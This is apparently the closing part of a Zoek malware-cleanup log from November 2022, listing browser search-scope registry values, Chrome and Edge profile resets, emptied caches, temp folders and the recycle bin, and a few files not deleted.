Old Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.msn.com/"

New Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.msn.com/"

==== All HKLM and HKCU SearchScopes ======================

HKLM\SearchScopes "DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
HKLM\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} - http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
HKLM\Wow6432Node\SearchScopes "DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
HKLM\Wow6432Node\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} - http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
HKCU\SearchScopes "DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
HKCU\SearchScopes\{012E1000-F331-11DB-8314-0800200C9A66} - http://www.google.com/search?q={searchTerms}
HKCU\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} - http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE11SR

==== Reset Google Chrome ======================

C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Guest Profile\Preferences was reset successfully
C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Guest Profile\Secure Preferences was reset successfully
C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Preferences was reset successfully
C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Preferences.bak was reset successfully
C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Secure Preferences was reset successfully
C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Secure Preferences.bak was reset successfully
C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Preferences was reset successfully
C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Preferences.bak was reset successfully
C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Secure Preferences was reset successfully
C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Secure Preferences.bak was reset successfully
C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\System Profile\Preferences was reset successfully
C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\System Profile\Secure Preferences was reset successfully
C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Preferences was reset successfully
C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences was reset successfully
C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Web Data will be reset at reboot
C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Web Data-journal will be reset at reboot
C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Web Data was reset successfully
C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\System Profile\Web Data was reset successfully
C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Web Data was reset successfully

==== Empty IE Cache ======================

C:\WINDOWS\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Users\Woytman\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\WINDOWS\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\Users\Woytman\AppData\Local\Microsoft\Windows\INetCache\IE emptied successfully

==== Empty FireFox Cache ======================

No FireFox Profiles found

==== Empty Edge Cache ======================

Edge Cache Emptied Successfully

==== Empty Chrome Cache ======================

C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Cache emptied successfully

==== Empty All Flash Cache ======================

No Flash Cache Found

==== Empty All Java Cache ======================

No Java Cache Found

==== C:\zoek_backup content ======================

C:\zoek_backup (files=865 folders=105 2167374357 bytes)

==== Empty Temp Folders ======================

C:\Users\Woytman\AppData\Local\Temp will be emptied at reboot
C:\WINDOWS\Temp will be emptied at reboot

==== After Reboot ======================

==== Empty Temp Folders ======================

C:\WINDOWS\Temp successfully emptied
C:\Users\Woytman\AppData\Local\Temp successfully emptied

==== Empty Recycle Bin ======================

C:\$RECYCLE.BIN successfully emptied

==== Deleting Files / Folders ======================

"C:\DumpStack.log.tmp" not deleted
"C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Web Data" not found
"C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Web Data-journal" not found

==== EOF on 08.11.2022 at 21:29:59,15 ======================

